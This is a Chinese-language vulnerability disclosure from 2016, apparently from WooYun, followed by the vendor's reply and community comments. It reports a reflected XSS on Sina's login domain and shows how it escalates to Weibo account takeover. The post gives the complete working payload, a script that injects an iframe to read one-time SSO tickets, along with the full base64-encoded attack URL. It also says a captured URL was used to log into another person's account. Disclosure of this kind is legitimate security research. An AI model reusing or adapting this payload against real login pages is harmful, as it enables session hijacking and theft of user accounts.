新浪微博之点击我的链接就登录你的微博（XSS敏感域）

一处反射型xss，用户名为base64编码， 没有过滤.

http://login.sina.com.cn/sso/login.php?su=ZnNkZnNkZicvPg0KPHNjcmlwdD4NCmFsZXJ0KC94c3MvKTsNCjwvc2NyaXB0Pjwn&sp=&encoding=UTF-8&returntype=META

因为是login.sina.com.cn下的xss，可以进一步利用。

微博单点登录获取ticket url:

http://login.sina.com.cn/sso/login.php?url=http%3A%2F%2Fweibo.com%2F&gateway=1&service=miniblog&entry=miniblog&useticket=1&returntype=META&_client_version=0.6.14

http://passport.weibo.com/wbsso/login?url=http%3A%2F%2Fweibo.com%2F&ticket=ST-*****-1459053552-xd-5025***98696******922F1*30E&retcode=0

经测试ticket是一次性的，没有绑定浏览器UA、客户端IP，所以只要获取到这条url，就能登录对应的微博账户了。

payload构造如下:

redirect=null;
 document.body.innerHTML="<iframe id=/"xxoo/" sandbox=/"allow-same-origin/" src=/"http://login.sina.com.cn/sso/login.php?url=http://weibo.com/&gateway=1&service=miniblog&entry=miniblog&useticket=1&returntype=META&_client_version=0.6.14/" onload=/"alert(document.getElementById('xxoo').contentWindow.document.body.innerHTML)/" width=/"0/" height=/"0/"/>";

redirect=null;重写redirect函数防止页面跳转。挂一个iframe，利用html5中iframe的sandbox属性，不执行iframe里边的js代码，而后onload事件获取iframe窗体内容，从而得到未使用的ticket。

构造好的url如下:

http://login.sina.com.cn/sso/login.php?su=ZnNkZnNkZicvPg0KPHNjcmlwdD4NCnJlZGlyZWN0PW51bGw7DQpkb2N1bWVudC5ib2R5LmlubmVySFRNTD0iPGlmcmFtZSBpZD1cInh4b29cIiBzYW5kYm94PVwiYWxsb3ctc2FtZS1vcmlnaW5cIiBzcmM9XCJodHRwOi8vbG9naW4uc2luYS5jb20uY24vc3NvL2xvZ2luLnBocD91cmw9aHR0cCUzQSUyRiUyRndlaWJvLmNvbSUyRiZnYXRld2F5PTEmc2VydmljZT1taW5pYmxvZyZlbnRyeT1taW5pYmxvZyZ1c2V0aWNrZXQ9MSZyZXR1cm50eXBlPU1FVEEmX2NsaWVudF92ZXJzaW9uPTAuNi4xNFwiIG9ubG9hZD1cImFsZXJ0KGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCd4eG9vJykuY29udGVudFdpbmRvdy5kb2N1bWVudC5ib2R5LmlubmVySFRNTClcIiB3aWR0aD1cIjBcIiBoZWlnaHQ9XCIwXCIvPiI7DQo8L3NjcmlwdD48Jw==&sp=&encoding=UTF-8&returntype=META

本地测试弹窗:

将窗体内容发送至cloudeye:

期间叫一个白帽子测试了一下，使用cloudeye记录的url成功登录他的微博。

.

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2016-03-28 12:39

厂商回复：

感谢关注新浪安全，问题修复中。

最新状态：

暂无

1. 2016-03-27 18:35 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec)

   1

   被盗号了

   1# 回复此人

2. 2016-03-27 18:56 | sqlfeng ( 普通白帽子 | Rank:721 漏洞数:86 | 江山父老能容我,不使人间造孽钱)

   1

   hacked by loopx9

   2# 回复此人

3. 2016-03-27 18:58 | hecate ( 普通白帽子 | Rank:823 漏洞数:129 | ®高级安全工程师 | WooYun认证√)

   1

   还好我几年没上过微博了

   3# 回复此人

4. 2016-03-27 19:28 | U神 ( 核心白帽子 | Rank:1375 漏洞数:153 | 乌云核心菜鸟，此号长期由联盟托管，如果近...)

   1

   支持loopx9大牛，来看看这个XSS是怎么牛逼利用的

   4# 回复此人

5. 2016-03-27 19:37 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

   1

   Mark

   5# 回复此人

6. 2016-03-27 19:38 | 田老板 ( 路人 | Rank:30 漏洞数:13 | 学校杀手)

   1

   前排

   6# 回复此人

7. 2016-03-27 19:46 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀，伊雅伊尔哟。)

   1

   前排。

   7# 回复此人

8. 2016-03-27 19:47 | 孤梦° ( 普通白帽子 | Rank:149 漏洞数:51 )

   1

   支持loopx9大牛，来看看这个XSS是怎么牛逼利用的

   8# 回复此人

9. 2016-03-27 19:48 | 镱鍚 ( 普通白帽子 | Rank:302 漏洞数:42 | 执手岁月留香，唱曲往事飞扬...)

   1

   说干就是干啊

   9# 回复此人

10. 2016-03-27 20:09 | tangtanglove ( 路人 | Rank:20 漏洞数:7 | 一个对安全感兴趣的屌丝phper)

    1

    反射的现在不是都不给审核吗？

    10# 回复此人

11. 2016-03-27 20:59 | 龚稳 ( 实习白帽子 | Rank:50 漏洞数:18 | 没有做不到的，只有不想做的)

    1

    大牛 我微博密码不知道了 帮帮忙呗

    11# 回复此人

12. 2016-04-17 12:56 | 玉林嘎 ( 普通白帽子 | Rank:941 漏洞数:108 )

    1

    Tomato菜的要死

    12# 回复此人